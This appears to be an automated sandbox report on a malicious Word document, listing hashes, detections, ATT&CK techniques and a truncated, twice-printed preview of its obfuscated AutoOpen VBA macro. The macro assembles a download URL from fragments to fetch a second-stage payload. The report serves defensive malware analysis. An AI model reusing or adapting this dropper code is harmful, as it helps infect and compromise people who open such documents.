Office (OLE) malware analysis — malicious · 206d6c776df4d148

MALICIOUS

Office (OLE)

134.5 KB Created: 2018-02-13 11:24:00 Authoring application: Microsoft Office Word First seen: 2018-02-19

MD5: 4169e0770526b833e39a053ef8b26dd0 SHA-1: cc33317f726a7e028e3f1e5211c9402b43a4965b SHA-256: 206d6c776df4d148e01dd89f5ac8d52d83edbb0bccd6aab4c0fad5ec6618b3c1

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes the Shell() function to execute a command, which is a critical indicator of malicious activity. The script attempts to construct a URL from concatenated strings, likely to download and execute a secondary payload. The presence of the ClamAV detection 'Doc.Dropper.Agent-6447642-0' further supports its classification as a dropper.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6447642-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6447642-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://TEO+TEOwww.umbrTEO+TEOiaTEOGX In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 28313 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	28313 bytes
SHA-256: `4fe53e97e32a8c01d071dc94a1507add62e3fc85ccb240471c6ab6573b469d41`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "XodNhRmGADEi" Sub AutoOpen() On Error Resume Next qqvjLRLhM = BzLniLqmATvT - Sgn(Qlb) - (1662083 - Tan(7165694) / 1095084 - ChrW(CJscpliBQfj)) qLhzmDpir = Kzc - Sgn(Xoi) - (9026326 - Tan(6997251) / 1702595 - ChrW(bdnsEiww)) jpVVkFHUQ = XTGNirLQcRzzGj - Sgn(JOiuHhUr) - (6517784 - Tan(2149684) / 2918321 - ChrW(csvQTOvMpTNw)) Application.Run "mvzSGPUJpVd", uowsAAaWWK wjoGjzhip = bqYaJSCbYCPBjX - Sgn(AdlLTjpAkw) - (5193777 - Tan(8699184) / 2738517 - ChrW(idjAd)) RErtEcKNu = iuwQZ - Sgn(VvWVSlqoci) - (4841846 - Tan(7790410) / 3300402 - ChrW(YiBGGcIjjjJT)) upBEicoiM = KfKfODRWDV - Sgn(EmAspJwWlPnLzq) - (225763 - Tan(7455522) / 4677804 - ChrW(wzm)) End Sub Function uowsAAaWWK() On Error Resume Next iAbEiE = IXQvY - Sgn(CYKSjzqFN) - (6854503 - Tan(2943590) / 1851622 - ChrW(KqLHHBwi)) PwPVTVHlAiD = FiKd - Sgn(pcWGas) - (3637239 - Tan(859332) / 135983 - ChrW(pMZqArUL)) aKqblWbSJK = rNTzPJuZsuS - Sgn(HFhAdrdpR) - (781619 - Tan(1072987) / 7970317 - ChrW(SubHiQkXZlCW)) nOjSiiMbI = NJJFsnzltXVQu + Mid(YhHv + "jJzFioNuiPIVuwXi+TEOasTEO+TEOdTEO+TEO.TEO+TEO9VE+9VEnextTGXY+GXYEO9VE'+'+9VE+9VE+'+'9VEGXY+GXYTEO(1TEO+TE9VE+9VEOklhXDco" + jGFEavOX, 17, 97) CbzflCHpHtV = zljJwdvHr - Sgn(ojRLQtBEzus) - (4178286 - Tan(1621605) / 6421955 - ChrW(APfzs)) chEfDtW = mMLZOKMVJLWSNb - Sgn(zwOoCdWklcc) - (9822451 - Tan(9426287) / 9689614 - ChrW(QHzmBW)) mOcNKciQ = mBip - Sgn(niVDvGcARQK) - (8084697 - Tan(3933777) / 2948382 - ChrW(ZwlLPWvvO)) JTpLqZCjqbf = GwfSaJhwhGs + Mid(WzrVUnHdJzPT + "jPLfMfICcGzE9'+'VE+9VETEO'+'eJfGXY+GXYL(tVGaTEO+TEOsfcTEO+T9VE+9VEEO.TEO+TEO'+'JfL9VE+9VEToStrYZhTEO+TEOiYTEO+T'+'EGXY+GXYOZhNgJfTEO+TEOL(TEO+TEO), T9VE+9VEEO+TEOtTEO+TEOVGSDwdwzKUElur" + KiiDiUf, 13, 162) KwSll = rnHkU - Sgn(PGFDEdajZJ) - (4707325 - Tan(755817) / 3653128 - ChrW(ZzuRJJmSNWwkm)) izjmAr = rPInNLFrrw - Sgn(jrGVWRMDfnssp) - (5248003 - Tan(2185643) / 8931145 - ChrW(sjGUqspKBkqHph)) sKnUjQv = wZdR - Sgn(zrFkjHuwWT) - (2379367 - Tan(355853) / 3353060 - ChrW(wIpYp)) zDXsPhHpmo = aZNtLMGMu + Mid(CQYhsUzwAwJ + "NOzECshtTEG9VE+9VEXY+GXY9VE'+'+'+'9VEO+TEOtps:/TEO+TEO/www.9VE+9VEnT9VE'+'kZnsIzUVYODjujVDComBsdqMvZjpFPP" + mujpQWZ, 7, 68) zPfLw = OHD - Sgn(wiTkH) - (213228 - Tan(4963567) / 4469257 - ChrW(HjGJWmmOKcwM)) zpfWwjaCiA = FGDQKiMiJh - Sgn(VmUoQjQpPiQ) - (6693493 - Tan(5691941) / 1722405 - ChrW(apoEfEw)) rWSIsKPYz = ZMjrqvK - Sgn(zzUnj) - (3393912 - Tan(9496781) / 9637995 - ChrW(LJzwoYZHs)) kjuplkAzaz = RLVjVwpFluQzuO + Mid(BdWniwrnhYopjj + "hNaaYnasRVCJEEOlicTEO+TEO TEO'+'+TEO+ K2TEO+TEOFjTEO+'+'TEOp1KTEOGXY+GXY+TEO2F +TEO+TEO TEO+TEOtVTEO+TEiWSMPcEUcUw" + IBnRPmWYPkSoMb, 14, 90) chLjH = swmPOWV - Sgn(olPtXV) - (7835144 - Tan(3171154) / 7279238 - ChrW(vizfj)) pdYiL = WAJncFbCQFal - Sgn(FTmWcljf) - (1516028 - Tan(9368720) / 3069601 - ChrW(qznvJTMRwtNMhl)) CZEjRW = JMdRuDtjrII - Sgn(uzIOEtnm) - (1401907 - Tan(7684222) / 1348191 - ChrW(mNTY)) DlLOhJYa = WpFBiXV + Mid(cjpZuEZSjJVhI + "jqCO+'+'T9VE'+'+9VEEOlienTEO+TEOtTEO+TEO;TEO+TEOt'+'VGNSBTEO+TEO =T9VE+9VEEO+TE9VE+9VEO tTEO+TEOGXY+G9VE+9VEXYVGTEO+TEOnTEO+TEGXY'+'+GXY9VE+9VEOsTEO+TEOaTEO+TEOdTE9VE+9VEOoHikEFHYGwot" + qaUuAUloHjwro, 4, 168) GTziT = UmjSjsY - Sgn(jZYroprUFqvA) - (6695587 - Tan(6381578) / 9135491 - ChrW(wrZD)) foRkaiwBt = IwoMdz - Sgn(DiPZu) - (78952 - Tan(9034384) / 7022626 - ChrW(BKmdlQplilnqc)) twqCoBYPD = pTVcbakf - Sgn(siQXa) - (4200451 - Tan(1185253) / 6616641 - ChrW(KNuhmZbsIDd)) LUvYKCj = FZpqBZSi + Mid(VwzRvmBwST + "qGEOFlTEOwTEOGXY+GXY+TE9VE+9VEOifi.'+'iTEO+TE9VE+9VEOtTEO+TEO/TEO+TEOUTEO+TEOe8JTEO+TEO/K2F.STEO+TEO'+'pTEO+TEOlit(TEGXY+GXYO+TEOK2TEO+TEOFTEO+TEO?K2TEO+TEOF)TEO+TEOfNtoVzOB" + iJStzcVFWfjj, 7, 158) wMjGNDFDB = ADXisdG - Sgn(toBoInMkRYcWks) - (5635998 - Tan(4142112) / 5952073 - ChrW(jjiNz)) dBDJrtwzQ = siiLEZoSukXsA - Sgn(ZcbajrEnhI) - ( ... (truncated)

SHA-256: 4fe53e97e32a8c01d071dc94a1507add62e3fc85ccb240471c6ab6573b469d41

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "XodNhRmGADEi"
Sub AutoOpen()
On Error Resume Next
qqvjLRLhM = BzLniLqmATvT - Sgn(Qlb) - (1662083 - Tan(7165694) / 1095084 - ChrW(CJscpliBQfj))
qLhzmDpir = Kzc - Sgn(Xoi) - (9026326 - Tan(6997251) / 1702595 - ChrW(bdnsEiww))
jpVVkFHUQ = XTGNirLQcRzzGj - Sgn(JOiuHhUr) - (6517784 - Tan(2149684) / 2918321 - ChrW(csvQTOvMpTNw))
Application.Run "mvzSGPUJpVd", uowsAAaWWK
wjoGjzhip = bqYaJSCbYCPBjX - Sgn(AdlLTjpAkw) - (5193777 - Tan(8699184) / 2738517 - ChrW(idjAd))
RErtEcKNu = iuwQZ - Sgn(VvWVSlqoci) - (4841846 - Tan(7790410) / 3300402 - ChrW(YiBGGcIjjjJT))
upBEicoiM = KfKfODRWDV - Sgn(EmAspJwWlPnLzq) - (225763 - Tan(7455522) / 4677804 - ChrW(wzm))
End Sub
Function uowsAAaWWK()
On Error Resume Next
iAbEiE = IXQvY - Sgn(CYKSjzqFN) - (6854503 - Tan(2943590) / 1851622 - ChrW(KqLHHBwi))
PwPVTVHlAiD = FiKd - Sgn(pcWGas) - (3637239 - Tan(859332) / 135983 - ChrW(pMZqArUL))
aKqblWbSJK = rNTzPJuZsuS - Sgn(HFhAdrdpR) - (781619 - Tan(1072987) / 7970317 - ChrW(SubHiQkXZlCW))
nOjSiiMbI = NJJFsnzltXVQu + Mid(YhHv + "jJzFioNuiPIVuwXi+TEOasTEO+TEOdTEO+TEO.TEO+TEO9VE+9VEnextTGXY+GXYEO9VE'+'+9VE+9VE+'+'9VEGXY+GXYTEO(1TEO+TE9VE+9VEOklhXDco" + jGFEavOX, 17, 97)
CbzflCHpHtV = zljJwdvHr - Sgn(ojRLQtBEzus) - (4178286 - Tan(1621605) / 6421955 - ChrW(APfzs))
chEfDtW = mMLZOKMVJLWSNb - Sgn(zwOoCdWklcc) - (9822451 - Tan(9426287) / 9689614 - ChrW(QHzmBW))
mOcNKciQ = mBip - Sgn(niVDvGcARQK) - (8084697 - Tan(3933777) / 2948382 - ChrW(ZwlLPWvvO))
JTpLqZCjqbf = GwfSaJhwhGs + Mid(WzrVUnHdJzPT + "jPLfMfICcGzE9'+'VE+9VETEO'+'eJfGXY+GXYL(tVGaTEO+TEOsfcTEO+T9VE+9VEEO.TEO+TEO'+'JfL9VE+9VEToStrYZhTEO+TEOiYTEO+T'+'EGXY+GXYOZhNgJfTEO+TEOL(TEO+TEO), T9VE+9VEEO+TEOtTEO+TEOVGSDwdwzKUElur" + KiiDiUf, 13, 162)
KwSll = rnHkU - Sgn(PGFDEdajZJ) - (4707325 - Tan(755817) / 3653128 - ChrW(ZzuRJJmSNWwkm))
izjmAr = rPInNLFrrw - Sgn(jrGVWRMDfnssp) - (5248003 - Tan(2185643) / 8931145 - ChrW(sjGUqspKBkqHph))
sKnUjQv = wZdR - Sgn(zrFkjHuwWT) - (2379367 - Tan(355853) / 3353060 - ChrW(wIpYp))
zDXsPhHpmo = aZNtLMGMu + Mid(CQYhsUzwAwJ + "NOzECshtTEG9VE+9VEXY+GXY9VE'+'+'+'9VEO+TEOtps:/TEO+TEO/www.9VE+9VEnT9VE'+'kZnsIzUVYODjujVDComBsdqMvZjpFPP" + mujpQWZ, 7, 68)
zPfLw = OHD - Sgn(wiTkH) - (213228 - Tan(4963567) / 4469257 - ChrW(HjGJWmmOKcwM))
zpfWwjaCiA = FGDQKiMiJh - Sgn(VmUoQjQpPiQ) - (6693493 - Tan(5691941) / 1722405 - ChrW(apoEfEw))
rWSIsKPYz = ZMjrqvK - Sgn(zzUnj) - (3393912 - Tan(9496781) / 9637995 - ChrW(LJzwoYZHs))
kjuplkAzaz = RLVjVwpFluQzuO + Mid(BdWniwrnhYopjj + "hNaaYnasRVCJEEOlicTEO+TEO TEO'+'+TEO+ K2TEO+TEOFjTEO+'+'TEOp1KTEOGXY+GXY+TEO2F +TEO+TEO TEO+TEOtVTEO+TEiWSMPcEUcUw" + IBnRPmWYPkSoMb, 14, 90)
chLjH = swmPOWV - Sgn(olPtXV) - (7835144 - Tan(3171154) / 7279238 - ChrW(vizfj))
pdYiL = WAJncFbCQFal - Sgn(FTmWcljf) - (1516028 - Tan(9368720) / 3069601 - ChrW(qznvJTMRwtNMhl))
CZEjRW = JMdRuDtjrII - Sgn(uzIOEtnm) - (1401907 - Tan(7684222) / 1348191 - ChrW(mNTY))
DlLOhJYa = WpFBiXV + Mid(cjpZuEZSjJVhI + "jqCO+'+'T9VE'+'+9VEEOlienTEO+TEOtTEO+TEO;TEO+TEOt'+'VGNSBTEO+TEO =T9VE+9VEEO+TE9VE+9VEO tTEO+TEOGXY+G9VE+9VEXYVGTEO+TEOnTEO+TEGXY'+'+GXY9VE+9VEOsTEO+TEOaTEO+TEOdTE9VE+9VEOoHikEFHYGwot" + qaUuAUloHjwro, 4, 168)
GTziT = UmjSjsY - Sgn(jZYroprUFqvA) - (6695587 - Tan(6381578) / 9135491 - ChrW(wrZD))
foRkaiwBt = IwoMdz - Sgn(DiPZu) - (78952 - Tan(9034384) / 7022626 - ChrW(BKmdlQplilnqc))
twqCoBYPD = pTVcbakf - Sgn(siQXa) - (4200451 - Tan(1185253) / 6616641 - ChrW(KNuhmZbsIDd))
LUvYKCj = FZpqBZSi + Mid(VwzRvmBwST + "qGEOFlTEOwTEOGXY+GXY+TE9VE+9VEOifi.'+'iTEO+TE9VE+9VEOtTEO+TEO/TEO+TEOUTEO+TEOe8JTEO+TEO/K2F.STEO+TEO'+'pTEO+TEOlit(TEGXY+GXYO+TEOK2TEO+TEOFTEO+TEO?K2TEO+TEOF)TEO+TEOfNtoVzOB" + iJStzcVFWfjj, 7, 158)
wMjGNDFDB = ADXisdG - Sgn(toBoInMkRYcWks) - (5635998 - Tan(4142112) / 5952073 - ChrW(jjiNz))
dBDJrtwzQ = siiLEZoSukXsA - Sgn(ZcbajrEnhI) - (
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.